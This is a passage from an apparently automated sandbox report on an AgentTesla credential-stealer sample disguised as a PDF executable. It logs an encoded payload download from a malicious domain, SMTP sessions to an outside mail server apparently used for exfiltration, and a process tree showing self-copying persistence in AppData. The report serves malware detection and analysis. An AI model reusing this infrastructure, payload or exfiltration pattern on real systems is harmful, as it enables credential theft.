                                                    Data Ascii: 7c97<p>GGFYjFiccFjFuFjFjFjFcFjFjFjFlAAFlAAFjFjFiLcFjFjFjFjFjFjFjFrcFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFilLFjFjFjFicFuiFiLrFicFjFiLjFYFljAFuuFiLcFiFGrFljAFuuFLcFijcFijAFiiAFulFiilFiicFiiiFijuFiicFYGFijYFulFYYFYGFiijFiijFiiiFiirFulFYLFijiFulFiicFiiGFiijFulFijAFiijFulFrLFGYFLuFulFijYFiiiFijjFijiFcrFiuFiuFijFurFjFjFjFjFjFjFjFLjFrYFjFjFGrFiFuFjFGrFiclFciFiLjFjFjFjFjFjFjFjFjFllcFjFucFjFiiFiFLjFjFjFLcFAFjFjFrFjFjFjFjFjFjFlllFiicFAFjFjFulFjFjFjFilLFAFjFjFjFjFilLFjFulFjFjFjFlFjFjFcFjFjFjFjFjFjFjFcFjFjFjFjFjFj
Feb 23, 2021 09:47:46.399477959 CET | 6139 | OUT | GET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1
Host: coroloboxorozor.com
Feb 23, 2021 09:47:46.466350079 CET | 6141 | IN | HTTP/1.1 200 OK
Date: Tue, 23 Feb 2021 08:47:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d24528de8c514e2616fdb192ac59864401614070066; expires=Thu, 25-Mar-21 08:47:46 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Mon, 22 Feb 2021 21:04:09 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 086fabc5050000c785a38f9000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=PqUUXu4f1rvXuUMAw85%2BUdAfZLkjsnMxkPsovmI8ZRJbqT5G%2Bpn7ksmsX%2BCgTSflESwRS41rZId7b6ZftfKm%2Fa0%2Bzc225%2FpIDrz1ZxPt3XGQVZM%2F"}],"max_age":604800,"group":"cf-nel"}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 625faf1b3911c785-AMS
                                                    Data Raw: 33 64 38 31 0d 0a 3c 70 3e 63 46 69 4c 72 46 4c 41 46 6c 63 63 46 6c 63 63 46 69 6a 4c 46 6c 41 75 46 59 75 46 69 63 46 6c 6c 6a 46 69 69 63 46 69 72 69 46 72 6c 46 6c 69 72 46 6c 69 72 46 4c 59 46 6c 75 63 46 72 4c 46 6c 6c 6a 46 47 41 46 6c 69 47 46 6c 75 41 46 69 41 75 46 47 6c 46 6c 69 4c 46 69 75 6c 46 6c 69 46 69 4c 63 46 69 4c 63 46 69 75 47 46 6c 72 46 6c 41 6a 46 69 41 6a 46 69 6c 6c 46 72 46 6c 46 69 63 47 46 69 69 47 46 6c 6a 46 69 4c 72 46 69 69 59 46 6c 69 72 46 69 6a 47 46 6c 75 75 46 69 75 72 46 47 6a 46 6c 6c 41 46 47 6a 46 6c 6c 4c 46 63 63 46 69 59 59 46 47 59 46 6c 69 59 46 69 69 75 46 6a 46 6c 41 69 46 69 41 63 46 72 6a 46 72 6a 46 6c 6a 69 46 59 6a 46 6c 41 6a 46 69 41 6a 46 72 69 46 6c 6a 69 46 4c 63 46 6c 6c 59 46 63 69 46 6c 6a 6a 46 4c 69 46 69 63 46 6c 63 63 46 69 75 41 46 69 75 41 46 75 4c 46 69 72 6c 46 72 69 46 69 59 6a 46 59 6c 46 63 46 69 41 59 46 47 72 46 6c 69 72 46 59 72 46 6c 41 69 46 6c 6c 46 69 72 75 46 6c 69 63 46 69 63 63 46 69 63 4c 46 63 6a 46 6c 63 75 46 69 72 6a 46 75 6a 46 69 47 6c 46 41 41 46 6c 69 63 46 69 69 59 46 69 69 59 46 69 46 69 41 6c 46 69 6c 4c 46 6c 47 46 6c 4c 46 69 47 75 46 69 69 72 46 69 41 46 59 4c 46 6c 4c 46 75 46 69 41 69 46 72 63 46 6c 75 47 46 69 69 47 46 6c 6a 46 69 4c 6a 46 47 59 46 69 6c 47 46 41 47 46 6c 6c 41 46 69 69 63 46 69 63 41 46 75 69 46 69 6a 72 46 75 75 46 6c 6c 6c 46 69 69 47 46 69 63 41 46 63 6a 46 69 4c 41 46 47 47 46 6c 6a 46 69 41 63 46 72 47 46 72 47 46 63 47 46 6c 6a 6c 46 59 69 46 6c 75 72 46 41 4c 46 6c 69 75 46 63 72 46 63 72 46 6c 41 6c 46 69 41 69 46 69 69 41 46 63 47 46 69 4c 63
                                                    Data Ascii: 3d81<p>cFiLrFLAFlccFlccFijLFlAuFYuFicFlljFiicFiriFrlFlirFlirFLYFlucFrLFlljFGAFliGFluAFiAuFGlFliLFiulFliFiLcFiLcFiuGFlrFlAjFiAjFillFrFlFicGFiiGFljFiLrFiiYFlirFijGFluuFiurFGjFllAFGjFllLFccFiYYFGYFliYFiiuFjFlAiFiAcFrjFrjFljiFYjFlAjFiAjFriFljiFLcFllYFciFljjFLiFicFlccFiuAFiuAFuLFirlFriFiYjFYlFcFiAYFGrFlirFYrFlAiFllFiruFlicFiccFicLFcjFlcuFirjFujFiGlFAAFlicFiiYFiiYFiFiAlFilLFlGFlLFiGuFiirFiAFYLFlLFuFiAiFrcFluGFiiGFljFiLjFGYFilGFAGFllAFiicFicAFuiFijrFuuFlllFiiGFicAFcjFiLAFGGFljFiAcFrGFrGFcGFljlFYiFlurFALFliuFcrFcrFlAlFiAiFiiAFcGFiLc


SMTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Feb 23, 2021 09:47:41.559540987 CET | 587 | 49763 | 103.17.211.69 | 192.168.2.4 | 220-cpsrv-02.onnet.my ESMTP Exim 4.93 #2 Tue, 23 Feb 2021 16:47:40 +0800
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Feb 23, 2021 09:47:41.560544968 CET | 49763 | 587 | 192.168.2.4 | 103.17.211.69 | EHLO 965543
Feb 23, 2021 09:47:41.785818100 CET | 587 | 49763 | 103.17.211.69 | 192.168.2.4 | 250-cpsrv-02.onnet.my Hello 965543 [84.17.52.38]
250-SIZE 20971520
250-8BITMIME
250-PIPELINING
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Feb 23, 2021 09:47:41.786395073 CET | 49763 | 587 | 192.168.2.4 | 103.17.211.69 | STARTTLS
Feb 23, 2021 09:47:42.016181946 CET | 587 | 49763 | 103.17.211.69 | 192.168.2.4 | 220 TLS go ahead
Feb 23, 2021 09:47:47.613730907 CET | 587 | 49765 | 103.17.211.69 | 192.168.2.4 | 220-cpsrv-02.onnet.my ESMTP Exim 4.93 #2 Tue, 23 Feb 2021 16:47:46 +0800
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Feb 23, 2021 09:47:47.613986015 CET | 49765 | 587 | 192.168.2.4 | 103.17.211.69 | EHLO 965543
Feb 23, 2021 09:47:47.846470118 CET | 587 | 49765 | 103.17.211.69 | 192.168.2.4 | 250-cpsrv-02.onnet.my Hello 965543 [84.17.52.38]
250-SIZE 20971520
250-8BITMIME
250-PIPELINING
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Feb 23, 2021 09:47:47.846772909 CET | 49765 | 587 | 192.168.2.4 | 103.17.211.69 | STARTTLS
Feb 23, 2021 09:47:48.083342075 CET | 587 | 49765 | 103.17.211.69 | 192.168.2.4 | 220 TLS go ahead
Feb 23, 2021 09:48:37.896342993 CET | 587 | 49775 | 103.17.211.69 | 192.168.2.4 | 220-cpsrv-02.onnet.my ESMTP Exim 4.93 #2 Tue, 23 Feb 2021 16:48:36 +0800
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Feb 23, 2021 09:48:37.898952961 CET | 49775 | 587 | 192.168.2.4 | 103.17.211.69 | EHLO 965543
Feb 23, 2021 09:48:38.129041910 CET | 587 | 49775 | 103.17.211.69 | 192.168.2.4 | 250-cpsrv-02.onnet.my Hello 965543 [84.17.52.38]
250-SIZE 20971520
250-8BITMIME
250-PIPELINING
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Feb 23, 2021 09:48:38.132936954 CET | 49775 | 587 | 192.168.2.4 | 103.17.211.69 | STARTTLS
Feb 23, 2021 09:48:38.366513968 CET | 587 | 49775 | 103.17.211.69 | 192.168.2.4 | 220 TLS go ahead
Feb 23, 2021 09:48:43.099941015 CET | 587 | 49776 | 103.17.211.69 | 192.168.2.4 | 220-cpsrv-02.onnet.my ESMTP Exim 4.93 #2 Tue, 23 Feb 2021 16:48:41 +0800
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Feb 23, 2021 09:48:43.100560904 CET | 49776 | 587 | 192.168.2.4 | 103.17.211.69 | EHLO 965543
Feb 23, 2021 09:48:43.331737995 CET | 587 | 49776 | 103.17.211.69 | 192.168.2.4 | 250-cpsrv-02.onnet.my Hello 965543 [84.17.52.38]
250-SIZE 20971520
250-8BITMIME
250-PIPELINING
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Feb 23, 2021 09:48:43.332259893 CET | 49776 | 587 | 192.168.2.4 | 103.17.211.69 | STARTTLS
Feb 23, 2021 09:48:43.568871021 CET | 587 | 49776 | 103.17.211.69 | 192.168.2.4 | 220 TLS go ahead

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 09:46:47
Start date: 23/02/2021
Path: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe'
Imagebase: 0x8a0000
File size: 20616 bytes
MD5 hash: 5AF8F94A752CA9996FBFBF01DCC30EDD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.702719345.000000000442A000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 09:46:54
Start date: 23/02/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\cmd.exe' /c timeout 1
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:46:54
Start date: 23/02/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:46:54
Start date: 23/02/2021
Path: C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit): true
Commandline: timeout 1
Imagebase: 0x1300000
File size: 26112 bytes
MD5 hash: 121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:09:46:57
                                                    Start date:23/02/2021
                                                    Path:C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                                                    Imagebase:0xa50000
                                                    File size:20616 bytes
                                                    MD5 hash:5AF8F94A752CA9996FBFBF01DCC30EDD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.915637033.0000000002DFA000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.915637033.0000000002DFA000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.912000692.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    General

                                                    Start time:09:46:59
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1588
                                                    Imagebase:0x240000
                                                    File size:434592 bytes
                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Reputation:high

                                                    General

                                                    Start time:09:47:32
                                                    Start date:23/02/2021
                                                    Path:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe'
                                                    Imagebase:0xc00000
                                                    File size:20616 bytes
                                                    MD5 hash:5AF8F94A752CA9996FBFBF01DCC30EDD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.833553760.00000000042AC000.00000004.00000001.sdmp, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 13%, ReversingLabs
                                                    Reputation:low

                                                    General

                                                    Start time:09:47:40
                                                    Start date:23/02/2021
                                                    Path:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe'
                                                    Imagebase:0x230000
                                                    File size:20616 bytes
                                                    MD5 hash:5AF8F94A752CA9996FBFBF01DCC30EDD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.832293360.000000000380F000.00000004.00000001.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    General

                                                    Start time:09:47:45
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                    Imagebase:0x11d0000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:09:47:46
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff724c50000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:09:47:46
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout 1
                                                    Imagebase:0x1300000
                                                    File size:26112 bytes
                                                    MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:09:47:50
                                                    Start date:23/02/2021
                                                    Path:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    Imagebase:0x520000
                                                    File size:20616 bytes
                                                    MD5 hash:5AF8F94A752CA9996FBFBF01DCC30EDD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.915676599.0000000002898000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.915676599.0000000002898000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.911999717.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    General

                                                    Start time:09:47:51
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 1956
                                                    Imagebase:0x240000
                                                    File size:434592 bytes
                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Reputation:high

                                                    General

                                                    Start time:09:47:52
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                    Imagebase:0x11d0000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:09:47:52
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff724c50000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:09:47:52
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout 1
                                                    Imagebase:0x1300000
                                                    File size:26112 bytes
                                                    MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:09:47:57
                                                    Start date:23/02/2021
                                                    Path:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    Imagebase:0xce0000
                                                    File size:20616 bytes
                                                    MD5 hash:5AF8F94A752CA9996FBFBF01DCC30EDD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.811192969.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    General

                                                    Start time:09:48:00
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1868
                                                    Imagebase:0x240000
                                                    File size:434592 bytes
                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
